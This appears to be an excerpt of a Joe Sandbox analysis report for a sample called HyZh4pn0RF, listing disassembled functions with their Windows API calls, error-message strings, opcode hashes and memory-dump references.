                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                                                                                                                                                                  • String ID: csm$f
                                                                                                                                                                                                                                                                                                  • API String ID: 2395640692-629598281
                                                                                                                                                                                                                                                                                                  • Opcode ID: c8f7f253a213423ff5db8842e39d1181b4fa0cc0edf0f0e27fe70a45a9ca17df
                                                                                                                                                                                                                                                                                                  • Instruction ID: 032cc04b7c975764d3db1731ad5f94eb7beb8ba6e2d51af6ef6e7e096b6f9384
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c8f7f253a213423ff5db8842e39d1181b4fa0cc0edf0f0e27fe70a45a9ca17df
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8A51D832B2A6C28AD714EF11E404AA9B7B5FB44B94FA18132DD5E47B48DF3AE940C710
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
                                                                                                                                                                                                                                                                                                  • String ID: Unhandled exception in script
                                                                                                                                                                                                                                                                                                  • API String ID: 3081866767-2699770090
                                                                                                                                                                                                                                                                                                  • Opcode ID: ef2f79dabe8b940bf64869f24e404b0ac86445532df2e67e8084f44f9f65f5c2
                                                                                                                                                                                                                                                                                                  • Instruction ID: 00e50198541b412914627654b9295259a4161d3e48d09620de290d25ff84654a
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ef2f79dabe8b940bf64869f24e404b0ac86445532df2e67e8084f44f9f65f5c2
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E2317032B19AC289EB20EF65E8556F9A360FF89784FA00136EA4D47B69DF3CD105C710
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(00000000,00000000,00000000,00007FF78F4887F2,?,?,?,?,?,?,?,?,?,?,?,00007FF78F48101D), ref: 00007FF78F482A14
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00007FF78F488560: GetLastError.KERNEL32(00000000,00007FF78F482A5E,?,?,?,?,?,?,?,?,?,?,?,00007FF78F48101D), ref: 00007FF78F488587
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00007FF78F488560: FormatMessageW.KERNEL32 ref: 00007FF78F4885B6
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00007FF78F488AE0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF78F482ABB), ref: 00007FF78F488B1A
                                                                                                                                                                                                                                                                                                  • MessageBoxW.USER32 ref: 00007FF78F482AF0
                                                                                                                                                                                                                                                                                                  • MessageBoxA.USER32 ref: 00007FF78F482B0C
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Message$ErrorLast$ByteCharFormatMultiWide
                                                                                                                                                                                                                                                                                                  • String ID: %s%s: %s$Fatal error detected
                                                                                                                                                                                                                                                                                                  • API String ID: 2806210788-2410924014
                                                                                                                                                                                                                                                                                                  • Opcode ID: c01ac0bbfceecfac493be67ae1d6a2211250b6a817a0c50f994bc812b65e1c92
                                                                                                                                                                                                                                                                                                  • Instruction ID: 657d95479d343ba20dc1a0f35c0520c5c87ad896af4ef830303cd76c41c1af63
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c01ac0bbfceecfac493be67ae1d6a2211250b6a817a0c50f994bc812b65e1c92
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 82314F72639AC691E630AB11E4516EAA364FF84784FA04037EA8D03A99DF3CD709CB50
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                                                                  • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                                                                  • Opcode ID: bbe3d75c1d18d9b252fc65a249d413b32bc9fbcf71b4c61f8ce4d80949566840
                                                                                                                                                                                                                                                                                                  • Instruction ID: 736de69fd870ab644eda438d15b713b2c72ae041566eb8e4d5f7f78f528dbdc1
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bbe3d75c1d18d9b252fc65a249d413b32bc9fbcf71b4c61f8ce4d80949566840
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B7F04471B0A74241EA106B55E8447B59760FF89761FE40236C56D471F4CF6DD589C360
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: _set_statfp
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 1156100317-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: a62d4fcbb0970871e45180a1f834c32a3c4d190302dd8db61346826940fa499d
                                                                                                                                                                                                                                                                                                  • Instruction ID: 3c51a5c3b6fe93715db59a6913d3505970383f09dec1a38a0d2d227e6c3c7775
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a62d4fcbb0970871e45180a1f834c32a3c4d190302dd8db61346826940fa499d
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 74119172E1EE8341F654352BE4423F994E17F553B0EF80636E96E077DACE6CA844C220
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • FlsGetValue.KERNEL32(?,?,?,00007FF78F49AB67,?,?,00000000,00007FF78F49AE02,?,?,?,?,?,00007FF78F4930CC), ref: 00007FF78F49B96F
                                                                                                                                                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,00007FF78F49AB67,?,?,00000000,00007FF78F49AE02,?,?,?,?,?,00007FF78F4930CC), ref: 00007FF78F49B98E
                                                                                                                                                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,00007FF78F49AB67,?,?,00000000,00007FF78F49AE02,?,?,?,?,?,00007FF78F4930CC), ref: 00007FF78F49B9B6
                                                                                                                                                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,00007FF78F49AB67,?,?,00000000,00007FF78F49AE02,?,?,?,?,?,00007FF78F4930CC), ref: 00007FF78F49B9C7
                                                                                                                                                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,00007FF78F49AB67,?,?,00000000,00007FF78F49AE02,?,?,?,?,?,00007FF78F4930CC), ref: 00007FF78F49B9D8
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Value
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 3702945584-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 9e1f5f4a1b3245dc74612c863be46776bcdac4bc40e164520dccced427665cd5
                                                                                                                                                                                                                                                                                                  • Instruction ID: b49d392781b8cb9ec418b1e098eafe4f6a402e3e713adda06ad729dc7db20c20
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9e1f5f4a1b3245dc74612c863be46776bcdac4bc40e164520dccced427665cd5
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 13117230B082C241FA547BA69551AF9E241BF443B0FB44336E87E477E7DE2CE941C620
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Value
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 3702945584-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 0e11ebfcfedaf50d903662c6f8872d2c6bdf32a6161de3e830a41dec96b80c12
                                                                                                                                                                                                                                                                                                  • Instruction ID: be7ada936706112e853fbf52559ad68d4ec2a66c3f611fcf30d3d1106a1f816d
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0e11ebfcfedaf50d903662c6f8872d2c6bdf32a6161de3e830a41dec96b80c12
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3A110A30F0928746FA58B6B158519F9A141BF88770FB40736D93D4B2E3DD2CB905C631
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                                  • String ID: verbose
                                                                                                                                                                                                                                                                                                  • API String ID: 3215553584-579935070
                                                                                                                                                                                                                                                                                                  • Opcode ID: ad3fface7d4b2ce3aa9510f497705372120eac90acd968bb25d3a192cbea6c12
                                                                                                                                                                                                                                                                                                  • Instruction ID: 6b500d8196353301fe43f7662d45bd5be6b89c27de926eaab9a143e9c2ff31b9
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ad3fface7d4b2ce3aa9510f497705372120eac90acd968bb25d3a192cbea6c12
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5091B032B0868685F761AA25D460BFDB6A1BB40B94FE44137DA6D473E5EE3CE841C720
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                                  • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                                                                                                                                                                                                  • API String ID: 3215553584-1196891531
                                                                                                                                                                                                                                                                                                  • Opcode ID: 1a54e2a2b62d6839c513ace75884cea9e48035532f3c44be9a18c4b4dcf643eb
                                                                                                                                                                                                                                                                                                  • Instruction ID: 7d9d4377f6224eb2cd70672c133ff035116e2c66cdcb563b51a5773e15621456
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1a54e2a2b62d6839c513ace75884cea9e48035532f3c44be9a18c4b4dcf643eb
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B581A576E0A28285F7647F2F81502F8B6A0BB11B88FF54037CA0D57297DA3DE941DB61
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CallEncodePointerTranslator
                                                                                                                                                                                                                                                                                                  • String ID: MOC$RCC
                                                                                                                                                                                                                                                                                                  • API String ID: 3544855599-2084237596
                                                                                                                                                                                                                                                                                                  • Opcode ID: 37ce56c1d967fba8f41503b71a699ba51a6fbc199d8f022e66d4a2d7a57293db
                                                                                                                                                                                                                                                                                                  • Instruction ID: c2edce990b409cb921ebead7a04f76362098b38416ff335d44372d6e73dbab39
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 37ce56c1d967fba8f41503b71a699ba51a6fbc199d8f022e66d4a2d7a57293db
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 57618B33A18B858AE710AF65D4403EDBBA0FB48B98F644226EF4D17B99DF38E445C710
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                                                                                                                                                  • String ID: csm$csm
                                                                                                                                                                                                                                                                                                  • API String ID: 3896166516-3733052814
                                                                                                                                                                                                                                                                                                  • Opcode ID: 80d5d2ed719ea387a00afc8e5c38e85421d4b0de11d669121429011e6c75d481
                                                                                                                                                                                                                                                                                                  • Instruction ID: fca32cdfd6f0477c6c1c19bcbfddce0d52b3fc5170aa9b173d01d209206b64ab
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 80d5d2ed719ea387a00afc8e5c38e85421d4b0de11d669121429011e6c75d481
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0051C4729282C286EB74AF1594443B8B7A0FB54BA4FA44137DA9C47BD6CF3CE491C710
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Message$ByteCharMultiWide
                                                                                                                                                                                                                                                                                                  • String ID: %s%s: %s$Fatal error detected
                                                                                                                                                                                                                                                                                                  • API String ID: 1878133881-2410924014
                                                                                                                                                                                                                                                                                                  • Opcode ID: e8e3c511841a02337865787422672dc7088828a74b651abb3bad42d47e8d3758
                                                                                                                                                                                                                                                                                                  • Instruction ID: 7e17de5979a10d38e1ebc60977257c16ce1728f5fe54cc8bc816aafd288b8576
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e8e3c511841a02337865787422672dc7088828a74b651abb3bad42d47e8d3758
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 29314272638AC191E620EB11E4516EAA3A4FF847C4FE04137EA8D47A99DF3CD749CB50
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetModuleFileNameW.KERNEL32(?,00007FF78F4839EA), ref: 00007FF78F483EF1
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00007FF78F4829E0: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF78F4887F2,?,?,?,?,?,?,?,?,?,?,?,00007FF78F48101D), ref: 00007FF78F482A14
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00007FF78F4829E0: MessageBoxW.USER32 ref: 00007FF78F482AF0
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorFileLastMessageModuleName
                                                                                                                                                                                                                                                                                                  • String ID: Failed to convert executable path to UTF-8.$Failed to get executable path.$GetModuleFileNameW
                                                                                                                                                                                                                                                                                                  • API String ID: 2581892565-1977442011
                                                                                                                                                                                                                                                                                                  • Opcode ID: 227eff0bc0a0d80c8f8e7ebb06cca3199172163df290dc8daf9e61b6ec9130a6
                                                                                                                                                                                                                                                                                                  • Instruction ID: 6f6f90f0f448e17875f2da14ae9c97277b0fe268de36952de3dbb1dd3327dcb5
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 227eff0bc0a0d80c8f8e7ebb06cca3199172163df290dc8daf9e61b6ec9130a6
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 31017131B3E6C244FA60B765E8553F69291BF5C784FE00437E94D87292EE1CE209C720
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
